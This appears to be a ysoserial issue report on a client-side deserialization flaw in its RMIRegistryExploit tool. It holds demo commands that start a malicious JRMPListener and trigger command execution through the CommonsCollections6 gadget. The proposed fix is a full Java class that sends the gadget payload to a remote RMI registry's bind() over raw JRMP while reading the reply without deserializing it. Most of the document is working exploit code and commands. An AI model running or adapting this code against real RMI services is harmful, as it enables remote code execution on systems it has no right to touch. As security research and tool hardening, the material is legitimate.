Open
Description
Using RMIRegistryExploit to exploit a malicious RMI registry may lead to RCE on the client.
Demo
First, start a malicious registry:

```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 calc.exe
```

and use RMIRegistryExploit to exploit it:

```
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 1099 CommonsCollections6 whoami
```

calc will be executed on the client.
Analysis
RMIRegistryExploit uses registry.list/bind, which triggers deserialization. So a malicious registry can attack the client with gadgets in ysoserial, such as CommonsCollections.
Gadget chain:

```
RegistryImpl_Stub#list -> UnicastRef#invoke -> StreamRemoteCall#executeCall -> ObjectInputStream#readObject
```
Fix
Rewrite the socket code to implement JRMP connections, just like what ysoserial.exploit.JRMPClient does.
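The approach the Fix section describes, as an added example that is not ysoserial's own code and not part of the report: the registry `bind()` call is written as a raw JRMP frame the way `JRMPClient` writes its DGC call, and the reply is inspected with a `DataInputStream` only, so nothing the registry sends back ever reaches `ObjectInputStream#readObject`. The class name `RawRegistryBind`, the helper `AnnotatingOutputStream` and the hard-coded numbers are assumptions of this example: the transport values mirror the JDK's `sun.rmi.transport.TransportConstants`, and the operation number and interface hash are the ones `RegistryImpl_Skel`/`RegistryImpl_Stub` use for `bind()`; the payload object is assumed to come from the ysoserial gadget named in the report. Caveat for the registry side: JDK registries since 8u121 apply a built-in deserialization filter to `bind()` arguments and may reject the gadget, which does not change the client-side protection shown here.

```java
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.rmi.server.ObjID;

public class RawRegistryBind {

    // JRMP transport constants; values as in sun.rmi.transport.TransportConstants,
    // hard-coded here (assumption of this example) to avoid the internal package.
    static final int MAGIC = 0x4a524d49;           // "JRMI"
    static final short VERSION = 2;
    static final byte SINGLE_OP_PROTOCOL = 0x4c;   // one call, no ProtocolAck round-trip
    static final byte CALL = 0x50;
    static final byte RETURN = 0x51;
    static final int STREAM_HEADER = 0xaced0005;   // ObjectOutputStream magic + version
    static final byte TC_BLOCKDATA = 0x77;
    static final byte NORMAL_RETURN = 1;
    static final byte EXCEPTIONAL_RETURN = 2;

    // bind() is operation 0 in RegistryImpl_Skel; the hash is the one RegistryImpl_Stub sends.
    static final int OP_BIND = 0;
    static final long REGISTRY_INTERFACE_HASH = 4905912898345647071L;

    // Stand-in for sun.rmi.server.MarshalOutputStream: the registry reads the call with a
    // MarshalInputStream, which expects a codebase annotation object after every class
    // descriptor. Writing null means "no codebase".
    static final class AnnotatingOutputStream extends ObjectOutputStream {
        AnnotatingOutputStream(OutputStream out) throws IOException { super(out); }

        @Override protected void annotateClass(Class<?> cl) throws IOException { writeObject(null); }

        @Override protected void annotateProxyClass(Class<?> cl) throws IOException { writeObject(null); }
    }

    // Sends bind(name, payload) to host:port as a single JRMP call and reports how the
    // registry answered. The payload is deserialized on the registry side only.
    public static String bind(String host, int port, String name, Object payload) throws IOException {
        try (Socket socket = new Socket(host, port)) {
            DataOutputStream dos = new DataOutputStream(socket.getOutputStream());
            dos.writeInt(MAGIC);
            dos.writeShort(VERSION);
            dos.writeByte(SINGLE_OP_PROTOCOL);
            dos.writeByte(CALL);

            // Call body as UnicastServerRef.dispatch / RegistryImpl_Skel read it:
            // target ObjID, operation number, interface hash, then the two bind() arguments.
            ObjectOutputStream out = new AnnotatingOutputStream(dos);
            new ObjID(ObjID.REGISTRY_ID).write(out);
            out.writeInt(OP_BIND);
            out.writeLong(REGISTRY_INTERFACE_HASH);
            out.writeObject(name);
            out.writeObject(payload);
            out.flush();

            return readReplyStatus(new DataInputStream(socket.getInputStream()));
        }
    }

    // Reads only the fixed-layout prefix of the JRMP reply: Return op byte, serialization
    // stream header, and the block-data record holding the return-type byte. The serialized
    // result or exception that follows stays unread; reading it with ObjectInputStream is
    // the readObject step a malicious registry targets.
    static String readReplyStatus(DataInputStream in) throws IOException {
        try {
            if (in.readByte() != RETURN) {
                return "unexpected transport op";
            }
            if (in.readInt() != STREAM_HEADER || in.readByte() != TC_BLOCKDATA) {
                return "unexpected reply layout";
            }
            in.readUnsignedByte();                 // block length: return-type byte + 14-byte UID
            byte returnType = in.readByte();
            if (returnType == NORMAL_RETURN) {
                return "normal return";
            }
            if (returnType == EXCEPTIONAL_RETURN) {
                return "exceptional return (exception object left unread)";
            }
            return "unknown return type " + returnType;
        } catch (EOFException eof) {
            return "connection closed without a reply";
        }
    }

    public static void main(String[] args) throws Exception {
        // Usage: RawRegistryBind <host> <port> <command>, with ysoserial on the classpath.
        // The gadget object is built by ysoserial's payload class named in the report.
        Object payload = new ysoserial.payloads.CommonsCollections6().getObject(args[2]);
        String status = bind(args[0], Integer.parseInt(args[1]), "pwned" + System.nanoTime(), payload);
        System.out.println("registry answered: " + status);
    }
}
```

The registry skeleton deserializes both `bind()` arguments before `RegistryImpl.bind` performs its local-host access check, which is why the call still matters from a remote client; on the client side, `readReplyStatus` is the only code that touches bytes from the registry, and it never constructs an `ObjectInputStream`, so a `JRMPListener` on the other end has nothing to trigger.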